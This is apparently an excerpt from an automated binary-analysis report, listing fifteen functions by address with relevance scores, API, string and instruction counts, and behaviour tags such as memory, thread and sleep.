Function 02BD213E Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Function 02BD5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Function 004014CF Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 02BD61DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Function 02BD790B Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 0040139F Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Function 02BD33F1 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Function 02BD472F Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 02BD5006 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Function 02BD2839 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 00401D3C Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 004012E6 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 00401BA9 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 004012FB Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 02BD5063 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON